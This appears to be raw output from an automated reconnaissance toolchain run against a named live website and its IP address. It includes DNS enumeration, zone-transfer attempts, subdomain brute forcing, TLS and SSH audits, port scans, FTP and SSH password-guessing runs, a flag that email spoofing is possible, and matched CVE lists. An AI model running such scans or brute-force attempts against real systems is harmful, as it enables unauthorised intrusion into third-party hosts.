1010Summary : Google-Analytics[Universal][UA-90400338-8], HTTPServer[Apache/2], Email[sinblogs@protonmail.com], WordPress[5.2.2], PoweredBy[Supercounters], Script[text/javascript,text/javascript>], X-Powered-By[PHP/5.6.35], HTML5, UncommonHeaders[upgrade,link], MetaGenerator[WordPress 5.2.2], PHP[5.6.35], Apache[2]
1011
1012Detected Plugins:
1013[ Apache ]
1014 The Apache HTTP Server Project is an effort to develop and
1015 maintain an open-source HTTP server for modern operating
1016 systems including UNIX and Windows NT. The goal of this
1017 project is to provide a secure, efficient and extensible
1018 server that provides HTTP services in sync with the current
1019 HTTP standards.
1020
1021 Version : 2 (from HTTP Server Header)
1022 Google Dorks: (3)
1023 Website : http://httpd.apache.org/
1024
1025[ Email ]
1026 Extract email addresses. Find valid email address and
1027 syntactically invalid email addresses from mailto: link
1028 tags. We match syntactically invalid links containing
1029 mailto: to catch anti-spam email addresses, eg. bob at
1030 gmail.com. This uses the simplified email regular
1031 expression from
1032 http://www.regular-expressions.info/email.html for valid
1033 email address matching.
1034
1035 String : sinblogs@protonmail.com
1036 String : sinblogs@protonmail.com
1037
1038[ Google-Analytics ]
1039 This plugin identifies the Google Analytics account.
1040
1041 Version : Universal
1042 Account : UA-90400338-8
1043 Website : http://www.google.com/analytics/
1044
1045[ HTML5 ]
1046 HTML version 5, detected by the doctype declaration
1047
1048
1049[ HTTPServer ]
1050 HTTP server header string. This plugin also attempts to
1051 identify the operating system from the server header.
1052
1053 String : Apache/2 (from server string)
1054
1055[ MetaGenerator ]
1056 This plugin identifies meta generator tags and extracts its
1057 value.
1058
1059 String : WordPress 5.2.2
1060
1061[ PHP ]
1062 PHP is a widely-used general-purpose scripting language
1063 that is especially suited for Web development and can be
1064 embedded into HTML. This plugin identifies PHP errors,
1065 modules and versions and extracts the local file path and
1066 username if present.
1067
1068 Version : 5.6.35
1069 Google Dorks: (2)
1070 Website : http://www.php.net/
1071
1072[ PoweredBy ]
1073 This plugin identifies instances of 'Powered by x' text and
1074 attempts to extract the value for x.
1075
1076 String : Supercounters
1077
1078[ Script ]
1079 This plugin detects instances of script HTML elements and
1080 returns the script language/type.
1081
1082 String : text/javascript,text/javascript>
1083
1084[ UncommonHeaders ]
1085 Uncommon HTTP server headers. The blacklist includes all
1086 the standard headers and many non standard but common ones.
1087 Interesting but fairly common headers should have their own
1088 plugins, eg. x-powered-by, server and x-aspnet-version.
1089 Info about headers can be found at www.http-stats.com
1090
1091 String : upgrade,link (from headers)
1092
1093[ WordPress ]
1094 WordPress is an opensource blogging system commonly used as
1095 a CMS.
1096
1097 Version : 5.2.2
1098 Aggressive function available (check plugin file or details).
1099 Google Dorks: (1)
1100 Website : http://www.wordpress.org/
1101
1102[ X-Powered-By ]
1103 X-Powered-By HTTP header
1104
1105 String : PHP/5.6.35 (from x-powered-by string)
1106
1107HTTP Headers:
1108 HTTP/1.1 200 OK
1109 Date: Sat, 20 Jul 2019 07:38:39 GMT
1110 Server: Apache/2
1111 Upgrade: h2,h2c
1112 Connection: Upgrade, close
1113 X-Powered-By: PHP/5.6.35
1114 Link: <http://idolblog.tv/wp-json/>; rel="https://api.w.org/"
1115 Vary: Accept-Encoding,User-Agent
1116 Content-Encoding: gzip
1117 Content-Length: 12267
1118 Content-Type: text/html; charset=UTF-8
1119#######################################################################################################################################
1120DNS Servers for idolblog.tv:
1121 ns1.dnsowl.com
1122 ns3.dnsowl.com
1123 ns2.dnsowl.com
1124
1125Trying zone transfer first...
1126 Testing ns1.dnsowl.com
1127 Request timed out or transfer not allowed.
1128 Testing ns3.dnsowl.com
1129 Request timed out or transfer not allowed.
1130 Testing ns2.dnsowl.com
1131 Request timed out or transfer not allowed.
1132
1133Unsuccessful in zone transfer (it was worth a shot)
1134Okay, trying the good old fashioned way... brute force
1135
1136Checking for wildcard DNS...
1137Nope. Good.
1138Now performing 2280 test(s)...
113989.248.174.131 www.idolblog.tv
1140
1141Subnets found (may want to probe here using nmap or unicornscan):
1142 89.248.174.0-255 : 1 hostnames found.
1143
1144Done with Fierce scan: http://ha.ckers.org/fierce/
1145Found 1 entries.
1146
1147Have a nice day.
1148#######################################################################################################################################
1149
1150
1151
1152 AVAILABLE PLUGINS
1153 -----------------
1154
1155 OpenSslCipherSuitesPlugin
1156 EarlyDataPlugin
1157 CertificateInfoPlugin
1158 HttpHeadersPlugin
1159 OpenSslCcsInjectionPlugin
1160 RobotPlugin
1161 CompressionPlugin
1162 SessionResumptionPlugin
1163 HeartbleedPlugin
1164 FallbackScsvPlugin
1165 SessionRenegotiationPlugin
1166
1167
1168
1169 CHECKING HOST(S) AVAILABILITY
1170 -----------------------------
1171
1172 89.248.174.131:443 => 89.248.174.131
1173
1174
1175
1176
1177 SCAN RESULTS FOR 89.248.174.131:443 - 89.248.174.131
1178 ----------------------------------------------------
1179
1180 * Downgrade Attacks:
1181 TLS_FALLBACK_SCSV: OK - Supported
1182
1183 * Session Renegotiation:
1184 Client-initiated Renegotiation: OK - Rejected
1185 Secure Renegotiation: OK - Supported
1186
1187 * OpenSSL Heartbleed:
1188 OK - Not vulnerable to Heartbleed
1189
1190 * TLSV1_1 Cipher Suites:
1191 Forward Secrecy OK - Supported
1192 RC4 OK - Not Supported
1193
1194 Preferred:
1195 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1196 Accepted:
1197 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1198 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1199 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1200 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1201 TLS_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
1202 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1203 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1204 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
1205 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1206 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1207 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1208 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1209
1210 * TLSV1_2 Cipher Suites:
1211 Forward Secrecy OK - Supported
1212 RC4 OK - Not Supported
1213
1214 Preferred:
1215 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
1216 Accepted:
1217 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1218 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1219 TLS_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
1220 TLS_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 200 OK
1221 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1222 TLS_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
1223 TLS_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
1224 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1225 TLS_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
1226 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
1227 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 256 bits HTTP 200 OK
1228 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1229 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
1230 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
1231 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1232 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
1233 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1234 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1235 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
1236 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 200 OK
1237 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1238 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
1239 TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
1240 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1241
1242 * OpenSSL CCS Injection:
1243 OK - Not vulnerable to OpenSSL CCS injection
1244
1245 * ROBOT Attack:
1246 OK - Not vulnerable
1247
1248 * Certificate Information:
1249 Content
1250 SHA1 Fingerprint: 3b0eb01d3e326df280d6071ae5f898b9338e779a
1251 Common Name: localhost
1252 Issuer: localhost
1253 Serial Number: 15411711591063170603
1254 Not Before: 2018-04-19 13:55:51
1255 Not After: 2045-09-03 13:55:51
1256 Signature Algorithm: sha256
1257 Public Key Algorithm: RSA
1258 Key Size: 2048
1259 Exponent: 65537 (0x10001)
1260 DNS Subject Alternative Names: []
1261
1262 Trust
1263 Hostname Validation: FAILED - Certificate does NOT match 89.248.174.131
1264 Android CA Store (9.0.0_r9): FAILED - Certificate is NOT Trusted: self signed certificate
1265 iOS CA Store (12, macOS 10.14, watchOS 5, and tvOS 12):FAILED - Certificate is NOT Trusted: self signed certificate
1266 Java CA Store (jdk-11.0.2): FAILED - Certificate is NOT Trusted: self signed certificate
1267 macOS CA Store (12, macOS 10.14, watchOS 5, and tvOS 12):FAILED - Certificate is NOT Trusted: self signed certificate
1268 Mozilla CA Store (2018-11-22): FAILED - Certificate is NOT Trusted: self signed certificate
1269 OPENJDK CA Store (jdk-11.0.2): FAILED - Certificate is NOT Trusted: self signed certificate
1270 Windows CA Store (2018-12-08): FAILED - Certificate is NOT Trusted: self signed certificate
1271 Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate
1272 Received Chain: localhost
1273 Verified Chain: ERROR - Could not build verified chain (certificate untrusted?)
1274 Received Chain Contains Anchor: ERROR - Could not build verified chain (certificate untrusted?)
1275 Received Chain Order: OK - Order is valid
1276 Verified Chain contains SHA1: ERROR - Could not build verified chain (certificate untrusted?)
1277
1278 Extensions
1279 OCSP Must-Staple: NOT SUPPORTED - Extension not found
1280 Certificate Transparency: NOT SUPPORTED - Extension not found
1281
1282 OCSP Stapling
1283 NOT SUPPORTED - Server did not send back an OCSP response
1284
1285 * TLS 1.2 Session Resumption Support:
1286 With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
1287 With TLS Tickets: OK - Supported
1288
1289 * SSLV2 Cipher Suites:
1290 Server rejected all cipher suites.
1291
1292 * Deflate Compression:
1293 OK - Compression disabled
1294
1295 * TLSV1 Cipher Suites:
1296 Forward Secrecy OK - Supported
1297 RC4 OK - Not Supported
1298
1299 Preferred:
1300 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1301 Accepted:
1302 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1303 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1304 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1305 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1306 TLS_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
1307 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1308 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1309 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
1310 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1311 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1312 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1313 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1314
1315 * TLSV1_3 Cipher Suites:
1316 Server rejected all cipher suites.
1317
1318 * SSLV3 Cipher Suites:
1319 Server rejected all cipher suites.
1320
1321
1322 SCAN COMPLETED IN 20.61 S
1323 -------------------------
1324######################################################################################################################################
1325dnsenum VERSION:1.2.4
1326
1327----- idolblog.tv -----
1328
1329
1330Host's addresses:
1331__________________
1332
1333idolblog.tv. 80647 IN A 89.248.174.131
1334
1335
1336Name Servers:
1337______________
1338
1339ns1.dnsowl.com. 86367 IN A 168.235.75.84
1340ns1.dnsowl.com. 86367 IN A 104.207.141.138
1341ns1.dnsowl.com. 86367 IN A 37.187.179.91
1342ns1.dnsowl.com. 86367 IN A 64.32.22.100
1343ns1.dnsowl.com. 86367 IN A 45.63.106.63
1344ns1.dnsowl.com. 86367 IN A 92.222.189.157
1345ns1.dnsowl.com. 86367 IN A 198.251.84.16
1346ns1.dnsowl.com. 86367 IN A 185.34.216.159
1347ns1.dnsowl.com. 86367 IN A 45.63.5.234
1348ns1.dnsowl.com. 86367 IN A 204.188.203.153
1349ns1.dnsowl.com. 86367 IN A 172.106.7.203
1350ns1.dnsowl.com. 86367 IN A 104.223.96.2
1351ns3.dnsowl.com. 86389 IN A 45.32.237.128
1352ns3.dnsowl.com. 86389 IN A 107.161.23.49
1353ns3.dnsowl.com. 86389 IN A 104.207.130.197
1354ns3.dnsowl.com. 86389 IN A 164.132.212.78
1355ns3.dnsowl.com. 86389 IN A 103.102.161.229
1356ns3.dnsowl.com. 86389 IN A 45.63.106.63
1357ns3.dnsowl.com. 86389 IN A 204.77.1.99
1358ns3.dnsowl.com. 86389 IN A 45.76.136.92
1359ns3.dnsowl.com. 86389 IN A 51.254.227.33
1360ns3.dnsowl.com. 86389 IN A 45.32.131.25
1361ns3.dnsowl.com. 86389 IN A 209.141.39.150
1362ns3.dnsowl.com. 86389 IN A 158.69.33.230
1363ns2.dnsowl.com. 86367 IN A 45.35.72.169
1364ns2.dnsowl.com. 86367 IN A 198.251.81.68
1365ns2.dnsowl.com. 86367 IN A 168.235.75.52
1366ns2.dnsowl.com. 86367 IN A 5.196.27.156
1367ns2.dnsowl.com. 86367 IN A 96.47.239.164
1368ns2.dnsowl.com. 86367 IN A 142.4.203.33
1369ns2.dnsowl.com. 86367 IN A 45.63.62.227
1370ns2.dnsowl.com. 86367 IN A 45.32.237.128
1371ns2.dnsowl.com. 86367 IN A 167.114.213.239
1372ns2.dnsowl.com. 86367 IN A 45.58.190.81
1373ns2.dnsowl.com. 86367 IN A 104.207.141.138
1374ns2.dnsowl.com. 86367 IN A 107.150.29.109
1375
1376
1377Mail (MX) Servers:
1378___________________
1379
1380
1381
1382Trying Zone Transfers and getting Bind Versions:
1383_________________________________________________
1384
1385
1386Trying Zone Transfer for idolblog.tv on ns1.dnsowl.com ...
1387
1388Trying Zone Transfer for idolblog.tv on ns3.dnsowl.com ...
1389
1390Trying Zone Transfer for idolblog.tv on ns2.dnsowl.com ...
1391
1392brute force file not specified, bay.
1393#######################################################################################################################################
1394
1395[-] Enumerating subdomains now for idolblog.tv
1396[-] verbosity is enabled, will show the subdomains results in realtime
1397[-] Searching now in Baidu..
1398[-] Searching now in Yahoo..
1399[-] Searching now in Google..
1400[-] Searching now in Bing..
1401[-] Searching now in Ask..
1402[-] Searching now in Netcraft..
1403[-] Searching now in DNSdumpster..
1404[-] Searching now in Virustotal..
1405[-] Searching now in ThreatCrowd..
1406[-] Searching now in SSL Certificates..
1407[-] Searching now in PassiveDNS..
1408DNSdumpster: www.idolblog.tv
1409[-] Saving results to file: /usr/share/sniper/loot/workspace/idolblog.tv/domains/domains-idolblog.tv.txt
1410[-] Total Unique Subdomains Found: 1
1411www.idolblog.tv
1412########################################################################################################################################
1413idolblog.tv,89.248.174.131
1414www.idolblog.tv,89.248.174.131
1415######################################################################################################################################
1416===============================================
1417-=Subfinder v1.1.3 github.com/subfinder/subfinder
1418===============================================
1419
1420
1421Running Source: Ask
1422Running Source: Archive.is
1423Running Source: Baidu
1424Running Source: Bing
1425Running Source: CertDB
1426Running Source: CertificateTransparency
1427Running Source: Certspotter
1428Running Source: Commoncrawl
1429Running Source: Crt.sh
1430Running Source: Dnsdb
1431Running Source: DNSDumpster
1432Running Source: DNSTable
1433Running Source: Dogpile
1434Running Source: Exalead
1435Running Source: Findsubdomains
1436Running Source: Googleter
1437Running Source: Hackertarget
1438Running Source: Ipv4Info
1439Running Source: PTRArchive
1440Running Source: Sitedossier
1441Running Source: Threatcrowd
1442Running Source: ThreatMiner
1443Running Source: WaybackArchive
1444Running Source: Yahoo
1445
1446Running enumeration on idolblog.tv
1447
1448dnsdb: Unexpected return status 503
1449
1450ipv4info: <nil>
1451
1452waybackarchive: parse http://web.archive.org/cdx/search/cdx?url=*.idolblog.tv/*&output=json&fl=original&collapse=urlkey&page=: net/url: invalid control character in URL
1453
1454dogpile: Get https://www.dogpile.com/search/web?q=idolblog.tv&qsi=1: EOF
1455
1456
1457Starting Bruteforcing of idolblog.tv with 9985 words
1458
1459Total 3 Unique subdomains found for idolblog.tv
1460
1461.idolblog.tv
1462www.idolblog.tv
1463www.idolblog.tv
1509#########################################################################################################################################
1510[+] idolblog.tv has no SPF record!
1511[*] No DMARC record found. Looking for organizational record
1512[+] No organizational DMARC record
1513[+] Spoofing possible for idolblog.tv!
1588#####################################################################################################################################
1589Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 03:29 EDT
1590Nmap scan report for idolblog.tv (89.248.174.131)
1591Host is up (0.25s latency).
1592Not shown: 339 closed ports, 123 filtered ports
1593Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
1594PORT STATE SERVICE
159521/tcp open ftp
159622/tcp open ssh
159753/tcp open domain
159880/tcp open http
1599110/tcp open pop3
1600111/tcp open rpcbind
1601143/tcp open imap
1602443/tcp open https
1603465/tcp open smtps
1604587/tcp open submission
1605993/tcp open imaps
1606995/tcp open pop3s
16072222/tcp open EtherNetIP-1
16083306/tcp open mysql
1609#####################################################################################################################################
1610Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 03:29 EDT
1611Nmap scan report for idolblog.tv (89.248.174.131)
1612Host is up (0.22s latency).
1613Not shown: 11 closed ports, 2 filtered ports
1614PORT STATE SERVICE
161553/udp open domain
1616
1617Nmap done: 1 IP address (1 host up) scanned in 6.68 seconds
1618##############################################################################################################################################
1619Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 03:29 EDT
1620Nmap scan report for idolblog.tv (89.248.174.131)
1621Host is up (0.24s latency).
1622
1623PORT STATE SERVICE VERSION
162421/tcp open ftp Pure-FTPd
1625| ftp-brute:
1626| Accounts: No valid accounts found
1627|_ Statistics: Performed 1712 guesses in 191 seconds, average tps: 8.8
1628| vulscan: VulDB - https://vuldb.com:
1629| [102925] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface pureftpd.passwd HTTP Request privilege escalation
1630| [57510] Pureftpd Pure-FTPd up to 0.x Memory Consumption denial of service
1631| [57504] Pureftpd Pure-FTPd up to 0.x ftp_parser.c Cleartext unknown vulnerability
1632|
1633| MITRE CVE - https://cve.mitre.org:
1634| [CVE-2004-0656] The accept_client function in PureFTPd 1.0.18 and earlier allows remote attackers to cause a denial of service by exceeding the maximum number of connections.
1635|
1636| SecurityFocus - https://www.securityfocus.com/bid/:
1637| [10664] PureFTPd Accept_Client Remote Denial of Service Vulnerability
1638|
1639| IBM X-Force - https://exchange.xforce.ibmcloud.com:
1640| No findings
1641|
1642| Exploit-DB - https://www.exploit-db.com:
1643| No findings
1644|
1645| OpenVAS (Nessus) - http://www.openvas.org:
1646| No findings
1647|
1648| SecurityTracker - https://www.securitytracker.com:
1649| [1010701] PureFTPd Logic Bug in accept_client() Lets Remote Users Crash the FTP Daemon
1650| [1008135] (Claim is Retracted) PureFTPd Buffer Overflow in displayrate() Lets Remote Users Crash the Service
1651| [1002993] PurePostPro Script Add-on for PureFTPd and MySQL Allows Remote Users to Execute SQL Commands on the Server
1652| [1001126] PureFTPd May Allow Remote Users to Deny Service on the Server
1653|
1654| OSVDB - http://www.osvdb.org:
1655| No findings
1656|_
1657Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1658Aggressive OS guesses: Linux 3.10 - 4.11 (91%), Linux 3.18 (91%), Linux 3.2 - 4.9 (91%), Crestron XPanel control system (89%), Linux 3.16 (88%), HP P2000 G3 NAS device (86%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.2 (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (86%)
1659No exact OS matches for host (test conditions non-ideal).
1660Network Distance: 10 hops
1661
1662TRACEROUTE (using port 21/tcp)
1663HOP RTT ADDRESS
16641 178.89 ms 10.247.200.1
16652 180.09 ms 213.184.122.97
16663 179.14 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
16674 179.35 ms bzq-219-189-185.dsl.bezeqint.net (62.219.189.185)
16685 179.77 ms bzq-114-65-1.cust.bezeqint.net (192.114.65.1)
16696 241.19 ms bzq-219-189-30.dsl.bezeqint.net (62.219.189.30)
16707 247.58 ms ae0-2.RT.IR9.AMS.NL.retn.net (87.245.232.123)
16718 248.99 ms ae0-2.RT.IR9.AMS.NL.retn.net (87.245.232.123)
16729 ...
167310 237.73 ms 89.248.174.131
1674#####################################################################################################################################
# general
(gen) banner: SSH-2.0-OpenSSH_7.4
(gen) software: OpenSSH 7.4
(gen) compatibility: OpenSSH 7.3+ (some functionality from 6.6), Dropbear SSH 2016.73+ (some functionality from 0.52)
(gen) compression: enabled (zlib@openssh.com)

# key exchange algorithms
(kex) curve25519-sha256 -- [warn] unknown algorithm
(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
 `- [info] available since OpenSSH 4.4
(kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
(kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
(kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] using weak hashing algorithm
 `- [info] available since OpenSSH 2.3.0
(kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
(kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
 `- [warn] using small 1024-bit modulus
 `- [warn] using weak hashing algorithm
 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28

# host-key algorithms
(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
(key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
(key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
(key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
 `- [warn] using weak random number generator could reveal the key
 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(key) ssh-ed25519 -- [info] available since OpenSSH 6.5

# encryption algorithms (ciphers)
(enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
 `- [info] default cipher since OpenSSH 6.9.
(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes192-ctr -- [info] available since OpenSSH 3.7
(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
(enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
(enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] using weak cipher mode
 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
(enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] using weak cipher mode
 `- [info] available since OpenSSH 2.3.0
(enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] using weak cipher mode
 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
(enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [fail] disabled since Dropbear SSH 0.53
 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
 `- [warn] using weak cipher mode
 `- [warn] using small 64-bit block size
 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
(enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
 `- [warn] using weak cipher mode
 `- [warn] using small 64-bit block size
 `- [info] available since OpenSSH 2.1.0
(enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] using weak cipher
 `- [warn] using weak cipher mode
 `- [warn] using small 64-bit block size
 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28

# message authentication code algorithms
(mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
 `- [info] available since OpenSSH 6.2
(mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
(mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
(mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
 `- [info] available since OpenSSH 6.2
(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
 `- [warn] using small 64-bit tag size
 `- [info] available since OpenSSH 4.7
(mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
 `- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
 `- [warn] using weak hashing algorithm
 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28

# algorithm recommendations (for OpenSSH 7.4)
(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
(rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
(rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
(rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
(rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
(rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
(rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
(rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
(rec) -blowfish-cbc -- enc algorithm to remove
(rec) -3des-cbc -- enc algorithm to remove
(rec) -aes256-cbc -- enc algorithm to remove
(rec) -cast128-cbc -- enc algorithm to remove
(rec) -aes192-cbc -- enc algorithm to remove
(rec) -aes128-cbc -- enc algorithm to remove
(rec) -hmac-sha2-512 -- mac algorithm to remove
(rec) -umac-128@openssh.com -- mac algorithm to remove
(rec) -hmac-sha2-256 -- mac algorithm to remove
(rec) -umac-64@openssh.com -- mac algorithm to remove
(rec) -hmac-sha1 -- mac algorithm to remove
(rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
(rec) -umac-64-etm@openssh.com -- mac algorithm to remove
#############################################################################################################################################
NSE: [ssh-run] Failed to specify credentials and command to run.
Nmap scan report for idolblog.tv (89.248.174.131)
Host is up (0.24s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-auth-methods:
| Supported authentication methods:
| publickey
| gssapi-keyex
| gssapi-with-mic
|_ password
| ssh-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 377 guesses in 181 seconds, average tps: 2.3
| ssh-hostkey:
| 2048 98:fd:8f:41:eb:fc:bd:34:58:73:ce:99:5d:71:81:bc (RSA)
| 256 0b:57:56:f3:00:4e:9e:3d:1a:f7:a7:03:2e:5a:7e:c3 (ECDSA)
|_ 256 bf:16:cf:23:b6:e2:4c:45:35:8f:9e:18:34:38:07:74 (ED25519)
|_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
|_ssh-run: Failed to specify credentials and command to run.
| vulners:
| cpe:/a:openbsd:openssh:7.4:
| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
|_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
| vulscan: VulDB - https://vuldb.com:
